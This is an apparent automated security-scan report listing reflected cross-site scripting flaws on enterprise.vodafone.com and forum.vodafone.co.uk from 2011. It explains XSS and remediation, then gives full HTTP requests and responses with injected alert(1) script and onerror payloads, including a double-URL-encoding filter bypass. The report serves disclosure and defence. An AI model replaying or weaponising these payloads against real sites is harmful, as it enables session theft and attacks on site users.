XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, vodafone.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://enterprise.vodafone.com/newsItem/search [filter1 parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the filter1 request parameter is copied into the HTML document as plain text between tags. The payload f9218<script>alert(1)</script>dee868c07c4 was submitted in the filter1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsItem/search?viewType=list&filter1=f9218<script>alert(1)</script>dee868c07c4&filter2=&filter3=&filter4=&keyword= HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:45 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 13135

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<span>X - f9218<script>alert(1)</script>dee868c07c4</span>
...[SNIP]...

1.2. http://enterprise.vodafone.com/newsItem/search [filter2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the filter2 request parameter is copied into the HTML document as plain text between tags. The payload adec4<script>alert(1)</script>3d7a0c02adc was submitted in the filter2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsItem/search?viewType=list&filter1=&filter2=adec4<script>alert(1)</script>3d7a0c02adc&filter3=&filter4=&keyword= HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:46 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 13135

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<span>X - adec4<script>alert(1)</script>3d7a0c02adc</span>
...[SNIP]...

1.3. http://enterprise.vodafone.com/newsItem/search [filter3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the filter3 request parameter is copied into the HTML document as plain text between tags. The payload c43bf<script>alert(1)</script>0761c5174b5 was submitted in the filter3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsItem/search?viewType=list&filter1=&filter2=&filter3=c43bf<script>alert(1)</script>0761c5174b5&filter4=&keyword= HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:47 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 13135

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<span>X - c43bf<script>alert(1)</script>0761c5174b5</span>
...[SNIP]...

1.4. http://enterprise.vodafone.com/newsItem/search [filter4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the filter4 request parameter is copied into the HTML document as plain text between tags. The payload 9e93f<script>alert(1)</script>e26a7165ee7 was submitted in the filter4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsItem/search?viewType=list&filter1=&filter2=&filter3=&filter4=9e93f<script>alert(1)</script>e26a7165ee7&keyword= HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:48 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 13138

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<span>X - 9e93f<script>alert(1)</script>e26a7165ee7</span>
...[SNIP]...

1.5. http://enterprise.vodafone.com/newsItem/search [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f13be"%3balert(1)//03278d6ebf1 was submitted in the keyword parameter. This input was echoed as f13be";alert(1)//03278d6ebf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsItem/search?viewType=list&filter1=&filter2=&filter3=&filter4=&keyword=f13be"%3balert(1)//03278d6ebf1 HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:50 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 13322

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<script type="text/javascript">
(function(){

var keyword = "f13be";alert(1)//03278d6ebf1";

if(keyword !== "notset" && keyword.length >
...[SNIP]...

1.6. http://enterprise.vodafone.com/newsItem/search [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ade5c<script>alert(1)</script>5bc077ca08a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsItem/search?viewType=list&filter1=&filter2=&filter3=&filter4=&keyword=ade5c<script>alert(1)</script>5bc077ca08a HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:51 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 13374

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<span >

Search for term "ade5c<script>alert(1)</script>5bc077ca08a" returned 0 results

</span>
...[SNIP]...

1.7. http://enterprise.vodafone.com/newsItem/search [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db2bc"><script>alert(1)</script>fd38b7fc58d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsItem/search?viewType=list&filter1=&filter2=&filter3=&filter4=&keyword=db2bc"><script>alert(1)</script>fd38b7fc58d HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:49 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 13382

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
<input id="search-body" style="width:300px;" type="text" name="keyword" value="db2bc"><script>alert(1)</script>fd38b7fc58d" onblur="if (this.value=='') this.value='';"/>
...[SNIP]...

1.8. http://enterprise.vodafone.com/newsItem/search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf379"><img%20src%3da%20onerror%3dalert(1)>51dff3f95c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf379\"><img src=a onerror=alert(1)>51dff3f95c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /newsItem/search?viewType=list&filter1=&filter2=&filter3=&filter4=&keyword=&cf379"><img%20src%3da%20onerror%3dalert(1)>51dff3f95c8=1 HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:28:00 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 101356

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
d=&cf379%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E51dff3f95c8=1&filter1=&filter2=&filter3=&filter4=&viewType=list" onclick="jQuery.ajax({type:'POST',data:{'offset': '12','max': '12','keyword': '','cf379\"><img src=a onerror=alert(1)>51dff3f95c8': '1','filter1': '','filter2': '','filter3': '','filter4': '','viewType': 'list','action': 'search','controller': 'newsItem'}, url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchR
...[SNIP]...

1.9. http://enterprise.vodafone.com/newsItem/search [viewType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/newsItem/search

Issue detail

The value of the viewType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac617"><img%20src%3da%20onerror%3dalert(1)>f8d604afcfb was submitted in the viewType parameter. This input was echoed as ac617\"><img src=a onerror=alert(1)>f8d604afcfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /newsItem/search?viewType=listac617"><img%20src%3da%20onerror%3dalert(1)>f8d604afcfb&filter1=&filter2=&filter3=&filter4=&keyword= HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:44 GMT
Server: Apache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 101328

<form onsubmit="jQuery.ajax({type:'post',data:jQuery(this).serialize(), url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},e
...[SNIP]...
+src%3Da+onerror%3Dalert%281%29%3Ef8d604afcfb" onclick="jQuery.ajax({type:'POST',data:{'offset': '12','max': '12','keyword': '','filter1': '','filter2': '','filter3': '','filter4': '','viewType': 'listac617\"><img src=a onerror=alert(1)>f8d604afcfb','action': 'search','controller': 'newsItem'}, url:'/newsItem/search',success:function(data,textStatus){jQuery('#searchResults').html(data);},error:function(XMLHttpRequest,textStatus,errorThrown){}});
...[SNIP]...

1.10. http://enterprise.vodafone.com/surveys/pollInclude.jsp [questionnaireInternalName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/surveys/pollInclude.jsp

Issue detail

The value of the questionnaireInternalName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9679'%3balert(1)//cf584b7fd2c was submitted in the questionnaireInternalName parameter. This input was echoed as b9679';alert(1)//cf584b7fd2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /surveys/pollInclude.jsp?questionnaireInternalName=poll_survey_toolsb9679'%3balert(1)//cf584b7fd2c&surveyStyle=Image1 HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html, */*
Referer: http://enterprise.vodafone.com/products_solutions/mobile_broadband/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; __utmb=112384592; s_cc=true; s_nr=1321640944942; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Aindex%2526pidt%253D1%2526oid%253Djavascript%25253AjumpMenu%252528%252529%2526ot%253DA; styles=null

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:29:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 4296

<div id="poll_survey_toolsb9679';alert(1)//cf584b7fd2cContainer">

</div>

<script type="text/javascript" src="/global/js/jquery.form.js"></script>

<script type="text/javascript">
jQuery(f
...[SNIP]...
function(response) {
jQuery("#poll_survey_toolsb9679';alert(1)//cf584b7fd2cContainer").html(response);
}
});
}

jQuery('#resultspoll_survey_toolsb9679';alert(1)//cf584b7fd2c')
.live('click', function() {

jQuery.ajax({
type: "GET",
url: "/surveyPoll.do?questionnaireInternalName=poll_survey_to
...[SNIP]...

1.11. http://enterprise.vodafone.com/surveys/pollInclude.jsp [questionnaireInternalName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/surveys/pollInclude.jsp

Issue detail

The value of the questionnaireInternalName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c9ce"%3balert(1)//c30b3946125 was submitted in the questionnaireInternalName parameter. This input was echoed as 4c9ce";alert(1)//c30b3946125 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /surveys/pollInclude.jsp?questionnaireInternalName=poll_survey_tools4c9ce"%3balert(1)//c30b3946125&surveyStyle=Image1 HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html, */*
Referer: http://enterprise.vodafone.com/products_solutions/mobile_broadband/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; __utmb=112384592; s_cc=true; s_nr=1321640944942; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Aindex%2526pidt%253D1%2526oid%253Djavascript%25253AjumpMenu%252528%252529%2526ot%253DA; styles=null

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:29:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 4296

<div id="poll_survey_tools4c9ce";alert(1)//c30b3946125Container">

</div>

<script type="text/javascript" src="/global/js/jquery.form.js"></script>

<script type="text/javascript">
jQuery(function () {

function setupForm(){
jQuery("#poll_survey_tools4c9ce";alert(1)//c30b3946125").ajaxForm({
beforeSubmit : function() {

if ( jQuery("input[type=radio]:checked").length >
...[SNIP]...

1.12. http://enterprise.vodafone.com/surveys/pollInclude.jsp [questionnaireInternalName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/surveys/pollInclude.jsp

Issue detail

The value of the questionnaireInternalName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e592c"><script>alert(1)</script>58a6bbae2a1 was submitted in the questionnaireInternalName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveys/pollInclude.jsp?questionnaireInternalName=poll_survey_toolse592c"><script>alert(1)</script>58a6bbae2a1&surveyStyle=Image1 HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html, */*
Referer: http://enterprise.vodafone.com/products_solutions/mobile_broadband/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; __utmb=112384592; s_cc=true; s_nr=1321640944942; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Aindex%2526pidt%253D1%2526oid%253Djavascript%25253AjumpMenu%252528%252529%2526ot%253DA; styles=null

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:29:26 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 4626

<div id="poll_survey_toolse592c"><script>alert(1)</script>58a6bbae2a1Container">

</div>

<script type="text/javascript" src="/global/js/jquery.form.js"></script>

<script type="text/javascrip
...[SNIP]...

1.13. http://enterprise.vodafone.com/surveys/pollInclude.jsp [surveyStyle parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/surveys/pollInclude.jsp

Issue detail

The value of the surveyStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5e84"%3balert(1)//587ce13addb was submitted in the surveyStyle parameter. This input was echoed as d5e84";alert(1)//587ce13addb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /surveys/pollInclude.jsp?questionnaireInternalName=poll_survey_tools&surveyStyle=Image1d5e84"%3balert(1)//587ce13addb HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html, */*
Referer: http://enterprise.vodafone.com/products_solutions/mobile_broadband/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_p7=flash%2011; __utmb=112384592; s_cc=true; s_nr=1321640944942; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dproducts_solutions%25253Aindex%2526pidt%253D1%2526oid%253Djavascript%25253AjumpMenu%252528%252529%2526ot%253DA; styles=null

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:29:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 3764

<div id="poll_survey_toolsContainer">

</div>

<script type="text/javascript" src="/global/js/jquery.form.js"></script>

<script type="text/javascript">
jQuery(function () {

function
...[SNIP]...
on() {

jQuery.ajax({
type: "GET",
url: "/surveyPoll.do?questionnaireInternalName=poll_survey_tools&results=true&surveyStyle=Image1d5e84";alert(1)//587ce13addb&container=poll_survey_toolsContainer",
success: function(data) {
jQuery('#poll_survey_toolsContainer').html(data);
},
befo
...[SNIP]...

1.14. http://forum.vodafone.co.uk/t5/Apple/bd-p/72 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Apple/bd-p/72

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload f2993%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03530ed17d7 was submitted in the REST URL parameter 4. This input was echoed as f2993</title><script>alert(1)</script>03530ed17d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /t5/Apple/bd-p/72f2993%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03530ed17d7 HTTP/1.1
Host: forum.vodafone.co.uk
